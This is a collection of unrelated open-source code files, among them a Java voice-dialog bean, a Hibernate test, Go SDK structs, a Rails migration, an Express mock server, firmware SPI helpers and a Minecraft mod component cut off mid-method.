this.grammars.add(grammar); } /** * Get whether the user has requested echoing the return value * * @return whether user has requested echo * True - echo has been requested * False, null - echo has not been requested */ public Boolean getEcho() { return echo; } /** * Set whether the user has requested echo * * @param echo - the user's choice to echo the return value */ public void setEcho(Boolean echo) { if (echo != null) { this.echo = echo; } } /** * Get the list of ambiguous values * * @return the map containing the list of ambiguous values */ public Map getAmbiguousValues() { return this.ambiguousValues; } /** * Set the map of ambiguous values * * @param ambigValues A map containing the ambiguous values */ public void setAmbiguousValues(Map ambigValues) { this.ambiguousValues = ambigValues; } /** * Get the Configuration value. * @return the Configuration value. */ public Document getConfiguration() { return configuration; } /** * Set the Configuration value. * @param newConfiguration The new Configuration value. */ public void setConfiguration(Document newConfiguration) { this.configuration = newConfiguration; } /** * The bean subclassing this instance. * Read only property. * * @return className */ public String getClassName() { return className; } /** * Get the value currently associated with the RDC * * @return the value */ public Object getValue() { return value; } /** * Set the value for this RDC instance. Update the isValid and * canonicalizedValue properties based on the new value. * * @param value The value returned by the client */ public void setValue(Object value) { if (value != null) { this.value = baseCanonicalize(value); setIsValid(baseValidate(this.value, true)); if (getIsValid() == Boolean.TRUE) { setCanonicalizedValue(calculateCanonicalizedValue(this.value)); } } } /** * Gets the initial value * * @return The default/initial value */ public Object getInitial() { return initial; } /** * Sets the initial value for this RDC. * Inheriting RDC beans that override this method must also take * responsibility for populating the initial grammar when appropriate. * * @param initial The default/initial value */ public void setInitial(Object initial) { if (initial != null) { this.initial = canonicalize(initial, true); if (this.initial != null) { // find appropriate place to validate if(baseValidate(this.initial, false) == Boolean.TRUE) { populateInitialGrammar(); } else { this.initial = null; grammars.remove(initialGrammar); } } } } /** * Get the skipSubmit value * * @return skipSubmit */ public Boolean getSkipSubmit() { return skipSubmit; } /** * Set the skipSubmit value. * An RDC will be asked to refrain from submitting its results * if a container or component higher up in the heirarchy takes * responsibility for submitting the results. * Example: First interaction turn of a mixed initiative dialog. * * @param newSkipSubmit */ public void setSkipSubmit(Boolean newSkipSubmit) { this.skipSubmit = newSkipSubmit; } /** * Get the minConfidence * * @return minConfidence the current value */ public float getMinConfidence() { return minConfidence; } /** * Set the minConfidence * * @param minConfidence the new value */ public void setMinConfidence(float minConfidence) { if (minConfidence > 0.0F) { this.minConfidence = minConfidence; } } /** * Get the n-best data string * * @return the serialized n-best data */ public String getCandidates() { return candidates; } /** * Set the candidates (serialized n-best data string). * Treatment depends on whether this component instance implements * the ValueInterpreter interface. * * @param candidates The serialized n-best results from the vxml browser * @see ValueInterpreter interface */ public void setCandidates(String candidates) { if (candidates.equals("MAX_NOINPUT")) { setExitStatus(Constants.EXIT_MAXNOINPUT); return; } else if (candidates.equals("MAX_NOMATCH")) { setExitStatus(Constants.EXIT_MAXNOMATCH); return; } this.candidates = candidates; NBestResults nbRes = new NBestResults(); nbRes.setNBestResults(candidates); int i = 0, numResults = nbRes.getNumNBest(); setErrorCode(ERR_NONE); // clear error code from previous input Object curValue = null; do { utterance = nbRes.getNthUtterance(i); interpretation = nbRes.getNthInterpretation(i); if (RDCUtils.implementsInterface(this.getClass(), ValueInterpreter.class)) { ((ValueInterpreter) this).setValueFromInterpretation(); } else { curValue = interpretation.get(Constants.STR_EMPTY); setValue(curValue); } } while (!isValid.booleanValue() && ++i < numResults && nbRes.getNthConfidence(i) > minConfidence); } /** * Get numNBest * * @return the maximum number of n-best values that the browser * will be asked to return */ public int getNumNBest() { return numNBest; } /** * Set numNBest * * @param numNBest the new maximum number of n-best values requested */ public void setNumNBest(int numNBest) { if (numNBest > 0) { this.numNBest = numNBest; } } /** * Get paramsMap - read-only property, no setter * * @return paramsMap */ public Map getParamsMap() { return paramsMap; } /** * Get the exitStatus value * * @return the exitStatus value */ public int getExitStatus() { return exitStatus; } /** * Set the exitStatus value * * @param exitStatus The new exitStatus value */ public void setExitStatus(int exitStatus) { this.exitStatus = exitStatus; } /** * Get the maxNoInput value * * @return Returns the maxNoInput. */ public int getMaxNoInput() { return maxNoInput; } /** * Set the maxNoInput value * * @param maxNoInput The maxNoInput to set. */ public void setMaxNoInput(int maxNoInput) { this.maxNoInput = maxNoInput; } /** * Get the maxNoMatch value * * @return Returns the maxNoMatch. */ public int getMaxNoMatch() { return maxNoMatch; } /** * Set the maxNoMatch value * * @param maxNoMatch The maxNoMatch to set. */ public void setMaxNoMatch(int maxNoMatch) { this.maxNoMatch = maxNoMatch; } /** * Set the Locale (String) for this RDC * * @param locale The locale (String) to set. */ public void setLocale(String locale) { if (RDCUtils.isStringEmpty(locale)) { return; } this.locale = locale; Locale newLocale = null; /* * Use - as delimiter for StringTokenizer, in line with IETF RFC 3066 * http://www.ietf.org/rfc/rfc3066.txt */ // No NPE catch since tokens won't be null if (locale.indexOf('-') == -1) { newLocale = new Locale(locale); } else { StringTokenizer localeToks = new StringTokenizer(locale, "-"); String lang = localeToks.nextToken(); String country = localeToks.nextToken(); newLocale = localeToks.hasMoreTokens() ? new Locale(lang, country, localeToks.nextToken()) : new Locale(lang, country); } if (newLocale == null) { return; } this.rdcLocale = newLocale; this.rdcResourceBundle = ResourceBundle.getBundle(Constants. STR_RDC_RESOURCE_BUNDLE, rdcLocale); } /** * Get the Locale (String) for this RDC * * @return locale The locale (String) */ public String getLocale() { return locale; } /** * Returns the Locale for this RDC, if it was set, or the default * Locale for this deployment * * @return Locale Returns the Locale for this RDC */ public Locale getRdcLocale() { // rdcLocale is transient, reclaim if necessary if (rdcLocale == null && !RDCUtils.isStringEmpty(locale)) { setLocale(locale); } if (rdcLocale == null) { rdcLocale = Constants.rdcLocale; } return rdcLocale; } /** * Return the resourceBundle. * * @return Returns the resourceBundle. */ public ResourceBundle getRdcResourceBundle() { // rdcResourceBundle is transient, reclaim if necessary if (rdcResourceBundle == null && !RDCUtils.isStringEmpty(locale)) { setLocale(locale); } if (rdcResourceBundle == null) { rdcResourceBundle = Constants.rdcResourceBundle; } return rdcResourceBundle; } /** * Transforms canonical data from client to its the corresponding value. * * @param input the value * @return the canonicalized value */ protected Object baseCanonicalize(Object input) { if (input instanceof String && "initial".equalsIgnoreCase((String)input)) { // user has selected initial value return initial; } return canonicalize(input, false); } /** * Validates the input against the given constraints. * Inheriting RDC bean must override this method to do any custom * validation. * * @return TRUE if valid, FALSE otherwise */ protected Boolean baseValidate(Object newValue, boolean setErrorCode) { if (errorCode != ERR_NONE) { // canonicalization failed, it has also set error code return Boolean.FALSE; } if (newValue == null) { // shouldn't be here // this will be reached only if the user selects initial value // when no such value is available if (setErrorCode) setErrorCode(ERR_NO_DEFAULT); return Boolean.FALSE; } return validate(newValue, setErrorCode); } /** * Hook for custom canonicalization. * Inheriting RDC bean must override this method to do any custom * canonicalization. * * @param input the value * @return the canonicalized value */ protected Object canonicalize(Object input, boolean isAttribute) { return input; } /** * Hook for custom validation. * Inheriting RDC bean must override this method to do any custom * validation. * * @return TRUE if valid, FALSE otherwise */ protected Boolean validate(Object newValue, boolean setErrorCode) { return Boolean.TRUE; } /** * Hook for custom canonicalized value calculation. * Inheriting RDC bean must override this method to do any custom * calculation of the canonical value. * * @return String The canonical value */ protected String calculateCanonicalizedValue(Object value) { // By default, use utterance return this.utterance; } /** * Create the request parameter and bean property mapping * */ private void populateParamsMap() { paramsMap.put(getId() + "ResultNBest", "candidates"); paramsMap.put(getId() + "Confirm", "confirmed"); } /** * Feed in the initial grammar * */ private void populateInitialGrammar() { MessageFormat initGramFormat = new MessageFormat(rdcResourceBundle. getString(PROPERTY_INITIAL_GRAMMAR), rdcLocale); Object[] args = { getId() }; initialGrammar = new Grammar(initGramFormat.format(args), Boolean.FALSE, Boolean.TRUE, DEFAULT_INITIAL_GRAMMAR_NAME); grammars.add(initialGrammar); } /** * Return the serialized value collected by this RDC, used * primarily as the value returned when this RDC is invoked by * a subdialog (means it goes out as a request parameter). */ public String getSerializedValue() { if (this.value == null) { // HTTP param value will be empty string return ""; } return this.value.toString(); } /** * Interface used by components to interpret the results sent * back from the vxml browser/client. * * Since value has type Object and is component specific, * the subclassing RDC should provide the mechanism to convert the * av pairs obtained from the serialized vxml interpretation * into the Object corresponding to its value. * * The subclassing RDC does not require to implement this interface if * its value is a String and its receives no named av pairs from client. * * @author <NAME> */ public interface ValueInterpreter { /** * Use the current value of the interpretation property of this * instance to determine the current value of the &quot;value&quot; * property. This method should also update the isValid and * canonicalizedValue properties based on the new value of the * &quot;value&quot; property. */ public void setValueFromInterpretation(); } }
midnightbr/Faculdade
java/JARS/hibernate-release-5.6.0.Final/project/hibernate-core/src/test/java/org/hibernate/test/schemaupdate/QuotedTableNameSchemaUpdateTest.java
/* * Hibernate, Relational Persistence for Idiomatic Java * * License: GNU Lesser General Public License (LGPL), version 2.1 or later. * See the lgpl.txt file in the root directory or <http://www.gnu.org/licenses/lgpl-2.1.html>. */ package org.hibernate.test.schemaupdate; import java.io.File; import java.io.IOException; import java.nio.charset.Charset; import java.nio.file.Files; import java.util.EnumSet; import java.util.List; import javax.persistence.Entity; import javax.persistence.Id; import javax.persistence.Table; import org.hibernate.boot.MetadataSources; import org.hibernate.boot.registry.StandardServiceRegistry; import org.hibernate.boot.registry.StandardServiceRegistryBuilder; import org.hibernate.boot.spi.MetadataImplementor; import org.hibernate.cfg.AvailableSettings; import org.hibernate.tool.hbm2ddl.SchemaExport; import org.hibernate.tool.hbm2ddl.SchemaUpdate; import org.hibernate.tool.schema.TargetType; import org.hibernate.testing.Skip; import org.hibernate.testing.TestForIssue; import org.hibernate.testing.junit4.BaseUnitTestCase; import org.junit.After; import org.junit.Before; import org.junit.Test; import static org.hamcrest.core.Is.is; import static org.junit.Assert.assertThat; /** * @author <NAME> */ public class QuotedTableNameSchemaUpdateTest extends BaseUnitTestCase { private File output; private StandardServiceRegistry ssr; @Before public void setUp() throws IOException { output = File.createTempFile( "update_script", ".sql" ); output.deleteOnExit(); ssr = new StandardServiceRegistryBuilder().applySetting( AvailableSettings.HBM2DDL_CREATE_SCHEMAS, "true" ) .build(); } @After public void tearsDown() { StandardServiceRegistryBuilder.destroy( ssr ); } @Test @TestForIssue(jiraKey = "<KEY>") @Skip(condition = Skip.OperatingSystem.Windows.class, message = "On Windows, MySQL is case insensitive!") public void testSchemaUpdateWithQuotedTableName() throws Exception { final MetadataSources metadataSources = new MetadataSources( ssr ); metadataSources.addAnnotatedClass( QuotedTable.class ); MetadataImplementor metadata = (MetadataImplementor) metadataSources.buildMetadata(); metadata.validate(); new SchemaExport() .setOutputFile( output.getAbsolutePath() ) .setFormat( false ) .create( EnumSet.of( TargetType.DATABASE ), metadata ); new SchemaUpdate().setHaltOnError( true ) .setOutputFile( output.getAbsolutePath() ) .setFormat( false ) .execute( EnumSet.of( TargetType.DATABASE, TargetType.SCRIPT ), metadata ); final List<String> sqlLines = Files.readAllLines( output.toPath(), Charset.defaultCharset() ); assertThat( "The update should recognize the existing table", sqlLines.isEmpty(), is( true ) ); new SchemaExport().setHaltOnError( true ) .setOutputFile( output.getAbsolutePath() ) .setFormat( false ) .drop( EnumSet.of( TargetType.DATABASE ), metadata ); } @Entity(name = "QuotedTable") @Table(name = "\"QuotedTable\"") public static class QuotedTable { @Id long id; } }
tonioshikanlu/tubman-hack
sources/b/l/d/q/f/g/b.java
package b.l.d.q.f.g; import b.e.a.a.a; import b.l.d.q.f.i.v; import java.util.Objects; public final class b extends z { public final v a; /* renamed from: b reason: collision with root package name */ public final String f5060b; public b(v vVar, String str) { Objects.requireNonNull(vVar, "Null report"); this.a = vVar; Objects.requireNonNull(str, "Null sessionId"); this.f5060b = str; } public v a() { return this.a; } public String b() { return this.f5060b; } public boolean equals(Object obj) { if (obj == this) { return true; } if (!(obj instanceof z)) { return false; } z zVar = (z) obj; return this.a.equals(zVar.a()) && this.f5060b.equals(zVar.b()); } public int hashCode() { return ((this.a.hashCode() ^ 1000003) * 1000003) ^ this.f5060b.hashCode(); } public String toString() { StringBuilder y = a.y("CrashlyticsReportWithSessionId{report="); y.append(this.a); y.append(", sessionId="); return a.q(y, this.f5060b, "}"); } }
saranshbht/bsc-codes
semester-6/Python Practice/numpyPractice/program4.py
import numpy as np x = np.array([1, 0, 0, 0]) print("Original array:") print(x) print("Test if any of the elements of a given array is non-zero:") print(np.any(x)) x = np.array([0, 0, 0, 0]) print("Original array:") print(x) print("Test if any of the elements of a given array is non-zero:") print(np.any(x))
onmyway133/Runtime-Headers
macOS/10.13/CoreData.framework/NSXPCStoreManagedObjectArchivingToken.h
<gh_stars>10-100 /* Generated by RuntimeBrowser Image: /System/Library/Frameworks/CoreData.framework/Versions/A/CoreData */ @interface NSXPCStoreManagedObjectArchivingToken : NSObject <NSCoding, NSSecureCoding> { NSURL * _managedObjectReferenceURI; } + (BOOL)supportsSecureCoding; - (id)URI; - (void)dealloc; - (void)encodeWithCoder:(id)arg1; - (id)initWithCoder:(id)arg1; - (id)initWithURI:(id)arg1; - (BOOL)isEqual:(id)arg1; @end
xiaozhu36/alibaba-cloud-sdk-go
services/reid/struct_accurate_overview_detail.go
package reid //Licensed under the Apache License, Version 2.0 (the "License"); //you may not use this file except in compliance with the License. //You may obtain a copy of the License at // //http://www.apache.org/licenses/LICENSE-2.0 // //Unless required by applicable law or agreed to in writing, software //distributed under the License is distributed on an "AS IS" BASIS, //WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. //See the License for the specific language governing permissions and //limitations under the License. // // Code generated by Alibaba Cloud SDK Code Generator. // Changes may cause incorrect behavior and will be lost if the code is regenerated. // AccurateOverviewDetail is a nested struct in reid response type AccurateOverviewDetail struct { StayDeepAvgWOWPercent string `json:"StayDeepAvgWOWPercent" xml:"StayDeepAvgWOWPercent"` StayDeepAvg string `json:"StayDeepAvg" xml:"StayDeepAvg"` UvAvgWOWPercent string `json:"UvAvgWOWPercent" xml:"UvAvgWOWPercent"` StayAvgPeriodWOWPercent string `json:"StayAvgPeriodWOWPercent" xml:"StayAvgPeriodWOWPercent"` UvWOWPercent string `json:"UvWOWPercent" xml:"UvWOWPercent"` UvEverySqmGrowthWOWPercent string `json:"UvEverySqmGrowthWOWPercent" xml:"UvEverySqmGrowthWOWPercent"` Uv int64 `json:"Uv" xml:"Uv"` UvEverySqm string `json:"UvEverySqm" xml:"UvEverySqm"` UvAvg string `json:"UvAvg" xml:"UvAvg"` StayAvgPeriod string `json:"StayAvgPeriod" xml:"StayAvgPeriod"` }
hunterBhough/epahomeratingapp-ui
common-ui/js/components/jobs/jobs-search/search-filter-inspection-stage/search-filter-inspection-stage.controller.js
<reponame>hunterBhough/epahomeratingapp-ui import _find from 'lodash/find'; class SearchFilterInspectionStageController { constructor ($stateParams, UI_ENUMS) { 'ngInject'; this.$stateParams = $stateParams; this.param = UI_ENUMS.SEARCH_PARAMS.INSPECTION_STAGE; this.options = Object.assign({}, UI_ENUMS.ANY, UI_ENUMS.CATEGORY_PROGRESS); } $onInit () { if (this.$stateParams[this.param]) { this.inspectionStage = [this.$stateParams[this.param]]; } else { this.reset(); } this.registerFilter({ filter : { reset : this.reset.bind(this), serialize : this.serialize.bind(this) } }); } reset () { this.inspectionStage = [this.options.Any.Key]; } setInspectionStage (result) { this.inspectionStage = result; } serialize () { let filter; if (this.inspectionStage[0] !== this.options.Any.Key) { let stageObject; stageObject = _find(this.options, (stage) => { return stage.Key === this.inspectionStage[0]; }); filter = { filterKey : this.param, filterName : stageObject.Name, param : {} }; filter.param[this.param] = this.inspectionStage[0]; } return filter; } } export default SearchFilterInspectionStageController;
chengdh/manage-huo-baby
db/migrate/20110125131136_create_journals.rb
# -*- encoding : utf-8 -*- #coding: utf-8 #coding: utf-8 #coding: utf-8 #日记账 class CreateJournals < ActiveRecord::Migration def self.up create_table :journals do |t| t.references :org,:null => false t.date :bill_date,:null => false t.references :user #已结算未汇金额 t.decimal :settled_no_rebate_fee,:precision => 15,:scale => 2,:default => 0 #已提货未结算金额 t.decimal :deliveried_no_settled_fee,:precision => 15,:scale => 2,:default => 0 #可录入项目1,2,3 t.string :input_name_1,:limit => 20 t.decimal :input_fee_1,:precision => 15,:scale => 2,:default => 0 t.string :input_name_2,:limit => 20 t.decimal :input_fee_2,:precision => 15,:scale => 2,:default => 0 t.string :input_name_3,:limit => 20 t.decimal :input_fee_3,:precision => 15,:scale => 2,:default => 0 #库存现金 t.decimal :cash,:precision => 15,:scale => 2,:default => 0 #银行存款 t.decimal :deposits,:precision => 15,:scale => 2,:default => 0 #返程货款 t.decimal :goods_fee,:precision => 15,:scale => 2,:default => 0 #短途运费及赔偿 t.decimal :short_fee,:precision => 15,:scale => 2,:default => 0 #其他开支 t.decimal :other_fee,:precision => 15,:scale => 2,:default => 0 #黑票 t.integer :black_bills,:default => 0 #红票 t.integer :red_bills,:default => 0 #黄票 t.integer :yellow_bills,:default => 0 #绿票 t.integer :green_bills,:default => 0 #蓝票 t.integer :blue_bills,:default => 0 #白票 t.integer :white_bills,:default => 0 #客户欠款 #当日欠款 t.decimal :current_debt,:precision => 15,:scale => 2,:default => 0 #2-3日欠款 t.decimal :current_debt_2_3,:precision => 15,:scale => 2,:default => 0 #4-5日欠款 t.decimal :current_debt_4_5,:precision => 15,:scale => 2,:default => 0 #6日以上欠款 t.decimal :current_debt_ge_6,:precision => 15,:scale => 2,:default => 0 t.text :note t.timestamps end end def self.down drop_table :journals end end
IBM/suro-oaas
suro-oaas/suro-oaas-redmine/src/main/resources/redmine-mock/app.js
var express = require('express') var bodyParser = require('body-parser') var app = express() // initialise issue Id with 1 (will be incremented) var issueId = 1; // create parser var jsonParser = bodyParser.json() // declare functions to check if values are defined and/or have the right format function isDefined(obj) { return (obj !== undefined && obj.trim() != ""); } function isNumber(obj) { return (obj !== undefined && !isNaN(obj)); } // POST /api/users gets JSON bodies app.post('/issues.json', jsonParser, function (req, res) { if (!req.body) return res.status(400).end(); if (req.body === undefined || req.body.issue === undefined) { return res.status(400).end(); } var issue = req.body.issue; // validate issue request if (isDefined(issue.subject) && isDefined(issue.description) && isNumber(issue.project_id) && isNumber(issue.tracker_id) && isNumber(issue.priority_id) && isNumber(issue.status_id)) { // determine current date for creation date var dateNow = new Date(); // set request headers (content type and return code) res.setHeader('content-type', 'application/json'); res.writeHead(201) // write API response res.end(JSON.stringify({ "issue": { "id": issueId, "project": { "id": issue.project_id, "name": "MockProject" }, "tracker": { "id": issue.tracker_id, "name": "MockTracker" }, "status": { "id": issue.status_id, "name": "MockStatus" }, "priority": { "id": issue.priority_id, "name": "MockPriority" }, "author": { "id": 1337, "name": "<NAME>" }, "subject": issue.subject, "description": issue.description, "start_date": dateNow.getFullYear() + "-" + dateNow.getMonth() + "-" + dateNow.getDate(), "done_ratio": 0, "custom_fields": [], "created_on": dateNow, "updated_on": dateNow } })); // increment the issue Id for the next issue issueId++; return res; } else { // validation failed, return 400 (invalid) return res.status(400) .end(); } }); // listen to port 3001 app.listen(3000);
sandialabs/avatar
src/array.h
/********************************************************************************** Avatar Tools Copyright (c) 2019, National Technology and Engineering Solutions of Sandia, LLC All rights reserved. Redistribution and use in source and binary forms, with or without modification, are permitted provided that the following conditions are met: 1. Redistributions of source code must retain the above copyright notice, this list of conditions and the following disclaimer. 2. Redistributions in binary form must reproduce the above copyright notice, this list of conditions and the following disclaimer in the documentation and/or other materials provided with the distribution. 3. Neither the name of the copyright holder nor the names of its contributors may be used to endorse or promote products derived from this software without specific prior written permission. THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. For questions, comments or contributions contact <NAME>, <EMAIL> *******************************************************************************/ #ifndef __ARRAY__ #define __ARRAY__ typedef enum { ASCENDING, DESCENDING } Sort_Order; void shuffle_sort_float_int(int size, float *array1, int *array2, int order); void shuffle_sort_int_int(int size, int *array1, int *array2, int order); void int_array_sort(int n, int *array); void int_two_array_sort(int n, int *ra, int *rb); //void float_index_table(int n, float *arrin, int **indx, int order); void float_int_array_sort(int n, float *ra, int *rb); //void int_index_table(int n, int *arrin, int **indx, int order); void float_array_sort(int n, float *array); //int array_union(int *array_a, int size_a, int *array_b, int size_b, int **Union); //int array_intersection(int *array_a, int size_a, int *array_b, int size_b, int **Intersection); //int array_diff(int *array_a, int size_a, int *array_b, int size_b, int **InANotB); int length_of_uid(int *array); void array_print(int *array, int size, char *title); int find_int(int value, int size, int *array); void find_int_release(); int remove_dups_int(int num, int *array); void parse_int_range(const char *str, int sort, int *num, int **range); void parse_delimited_string(char delimiter, char *str, int *num, char ***tokens); void _parse_comma_sep_string(char *str, int *num, char ***tokens); void parse_space_sep_string(char *str, int *num, char ***tokens); void parse_float_range(char *str, int sort, int *num, float **range); int int_find_max(int *array, int size, int *max); int array_to_range(const int *array, int num, char **range); /* * Delete leading and trailing whitespace from str. * * Pre: str != NULL * Post: Any whitespace that was prefixed or suffixed on str is removed. * The pointer str points to beginning of remaining content. * * NB: this function modifies the given string in place. */ void strip_lt_whitespace(char* str); float int_average(int *array, int start, int end); float float_average(float *array, int start, int end); float int_stddev(int *array, int start, int end); float float_stddev(float *array, int start, int end); #endif // __ARRAY__
smnarayanan/slimbootloader
BootloaderCommonPkg/Library/SpiBlockIoLib/SpiBlockIoLib.c
<gh_stars>1-10 /** @file This file provides some helper functions via run time service support specific to SPI flash device. Copyright (c) 2017, Intel Corporation. All rights reserved.<BR> SPDX-License-Identifier: BSD-2-Clause-Patent **/ #include <Library/BaseLib.h> #include <Library/SpiBlockIoLib.h> #include <Library/BootloaderCommonLib.h> SPI_FLASH_SERVICE *mSpiService = NULL; /** Initialize a SPI instance. @param[in] SpiPciBase The PCI base of the SPI flash device. @param[in] DevInitPhase The initialization phase to prepare the device. @retval EFI_SUCCESS The driver is successfully initialized. @retval EFI_UNSUPPORTED The call is unsupported. @retval Others Can't initialize the SPI device. **/ EFI_STATUS EFIAPI InitializeSpi ( IN UINTN SpiPciBase, IN DEVICE_INIT_PHASE DevInitPhase ) { EFI_STATUS Status; if (DevInitPhase == DevDeinit) { // Handle Deinit if required. return EFI_SUCCESS; } mSpiService = (SPI_FLASH_SERVICE *) GetServiceBySignature (SPI_FLASH_SERVICE_SIGNATURE); if (mSpiService == NULL) { return EFI_UNSUPPORTED; } Status = mSpiService->SpiInit (); return Status; } /** This function reads blocks from the SPI slave device. @param[in] RegionType The region type of the SPI area to read from. @param[in] Address The block address in the RegionType to read from on the SPI. @param[in] BufferSize Size of the Buffer in bytes. @param[out] Buffer Pointer to caller-allocated buffer containing the data received during the SPI cycle. @retval EFI_SUCCESS SPI command completes successfully. @retval EFI_DEVICE_ERROR Device error, the command aborts abnormally. @retval EFI_ACCESS_DENIED Some unrecognized or blocked command encountered in hardware sequencing mode. @retval EFI_UNSUPPORTED The call is unsupported. @retval EFI_INVALID_PARAMETER The parameters specified are not valid. **/ EFI_STATUS EFIAPI SpiReadBlocks ( IN UINTN RegionType, IN EFI_PEI_LBA Address, IN UINTN BufferSize, OUT VOID *Buffer ) { EFI_STATUS Status; if (mSpiService == NULL) { return EFI_UNSUPPORTED; } if (Address == 0xFFFFFFFF) { return EFI_NO_MEDIA; } Status = mSpiService->SpiRead (FlashRegionAll, (UINT32) (Address * SPI_BLOCK_SIZE), (UINT32)BufferSize, Buffer); return Status; } /** Gets a SPI device's media information. This function will provide the caller with the specified SPI device's media information. If the media changes, calling this function will update the media information accordingly. @param[in] RegionType Didn't use now. @param[out] DevBlockInfo The Block Io information of the SPI device. @retval EFI_SUCCESS The Block Io information about the specified block device was obtained successfully. @retval EFI_UNSUPPORTED The call is unsupported. @retval EFI_DEVICE_ERROR Cannot get the media information due to a hardware error. **/ EFI_STATUS EFIAPI SpiGetMediaInfo ( UINTN RegionType, DEVICE_BLOCK_INFO *DevBlockInfo ) { // This Lib will only support Images in PDR region // And need minor update this lib to support it. return EFI_UNSUPPORTED; #if 0 EFI_STATUS Status; UINT32 FlashBase; UINT32 FlashSize; if (mSpiService == NULL) { return EFI_UNSUPPORTED; } if (DevBlockInfo == NULL) { return EFI_INVALID_PARAMETER; } Status = mSpiService->SpiGetRegion (FlashRegionAll, &FlashBase, &FlashSize); DevBlockInfo->BlockNum = ((FlashSize % SPI_BLOCK_SIZE) == 0) ? FlashSize / SPI_BLOCK_SIZE : (FlashSize / SPI_BLOCK_SIZE) + 1; DevBlockInfo->BlockSize = SPI_BLOCK_SIZE; return Status; #endif }
demurgos/skype-web-reversed
skype/latest/decompiled/fullExperience/rjs$$ui/components/chat/recentItem.js
define("ui/components/chat/recentItem", [ "require", "exports", "module", "constants/components", "text!views/chat/timeline/recentItem.html" ], function (e, t) { t.name = e("constants/components").chat.RECENT_ITEM; t.template = e("text!views/chat/timeline/recentItem.html"); });
johnzupin/VulkanTools
vkconfig/main_gui.cpp
/* * Copyright (c) 2020 Valve Corporation * Copyright (c) 2020 LunarG, Inc. * * Licensed under the Apache License, Version 2.0 (the "License"); * you may not use this file except in compliance with the License. * You may obtain a copy of the License at * * http://www.apache.org/licenses/LICENSE-2.0 * * Unless required by applicable law or agreed to in writing, software * distributed under the License is distributed on an "AS IS" BASIS, * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. * See the License for the specific language governing permissions and * limitations under the License. * * Authors: * - <NAME> <<EMAIL>> */ #include "main_gui.h" #include "mainwindow.h" #include "../vkconfig_core/version.h" #include "../vkconfig_core/application_singleton.h" #include <QApplication> #include <QCheckBox> #include <QMessageBox> int run_gui(int argc, char* argv[]) { QCoreApplication::setOrganizationName("LunarG"); QCoreApplication::setOrganizationDomain("lunarg.com"); // This is used by QSettings for .ini, registry, and .plist files. // It needs to not have spaces in it, and by default is the same as // the executable name. If we rename the executable at a later date, // keeping this as 'vkconfig' will ensure that it picks up the // settings from the previous version (assuming that's ever an issue) QCoreApplication::setApplicationName(VKCONFIG_SHORT_NAME); // Older Qt versions do not have this. Dynamically check the version // of Qt since it's just an enumerant. Versions 5.6.0 and later have // high dpi support. We really don't need to check the 5, but for // the sake of completeness and mabye compatibility with qt 6. // Also ignoring the trailing point releases const char* version = qVersion(); int version_major, version_minor; sscanf(version, "%d.%d", &version_major, &version_minor); if (version_major >= 5 && version_minor >= 6) { // Qt::AA_EnableHighDpiScaling = 20 from qnamespace.h in Qt 5.6 or later QCoreApplication::setAttribute((Qt::ApplicationAttribute)20); } QApplication app(argc, argv); // This has to go after the construction of QApplication in // order to use a QMessageBox and avoid some QThread warnings. const ApplicationSingleton singleton("vkconfig_single_instance"); if (!singleton.IsFirstInstance()) { QMessageBox alert(nullptr); alert.setWindowTitle("Cannot start another instance of vkconfig"); alert.setIcon(QMessageBox::Critical); alert.setText("Another copy of vkconfig is currently running. Please close the other instance and try again."); alert.exec(); return -1; } // We simply cannot run without any layers if (Configurator::Get().Init() == false) return -1; // The main GUI is driven here MainWindow main_window; main_window.show(); return app.exec(); }
SDF-Bramble/Artifacts-Reloaded
artifactsreloaded/common/components/effects/CAirwalk.java
package archived.artifactsreloaded.common.components.effects; import java.util.List; import java.util.Random; import net.minecraft.entity.Entity; import net.minecraft.entity.player.EntityPlayer; import net.minecraft.item.ItemStack; import net.minecraft.world.World; import archived.artifactsreloaded.common.components.BaseComponent; public class CAirwalk extends BaseComponent { public CAirWalk() { } public String getRandomTrigger(Random rand, boolean isArmor) { if(!isArmor) { return "onHeld"; } else { return "onArmorTickUpdate"; } } public void addInformation(ItemStack itemStack, EntityPlayer player, List list, String trigger, boolean advTooltip) { list.add(StatCollector.translateToLocal("effect.Allows sneaking on air") + " " + StatCollector.translateToLocal("tool."+trigger)); } @Override public void addInformation(ItemStack itemStack, EntityPlayer player, List list, boolean advTooltip) { list.add(StatCollector.translateToLocal("effect.Allows sneaking on air")); } @Override public void onHeld(ItemStack itemStack, World world, Entity entity, int par4, boolean par5) { //Similar to the ComponentLight code. Sets the block beneath the player to solid air, //and cleans up any solid air blocks that were there before. if(entity instanceof EntityPlayer) { EntityPlayer player = (EntityPlayer) entity; if(player.isSneaking()) { int lastX = itemStack.stackTagCompound.getInteger("lastAirX"); int lastY = itemStack.stackTagCompound.getInteger("lastAirY"); int lastZ = itemStack.stackTagCompound.getInteger("lastAirZ"); int newX = MathHelper.floor_double(entity.posX); int newY = MathHelper.floor_double(entity.posY-1); int newZ = MathHelper.floor_double(entity.posZ); //If the player isn't standing on solid air, set the block beneath their feet so solid air. if(world.getBlock(newX, newY, newZ) != BlockSolidAir.instance) { if(lastY >= 0 && lastY < 256 && world.getBlock(lastX, lastY, lastZ) == BlockSolidAir.instance) { //System.out.println("Setting solid air at x="+lastX+", y="+lastY+", z="+lastZ+" to air."); world.setBlockToAir(lastX, lastY, lastZ); } if(newY >= 0 && newY < 256 && world.isAirBlock(newX, newY, newZ)) { //System.out.println("Creating solid air at x="+newX+", y="+newY+", z="+newZ+"."); boolean worked = world.setBlock(newX, newY, newZ, BlockSolidAir.instance); 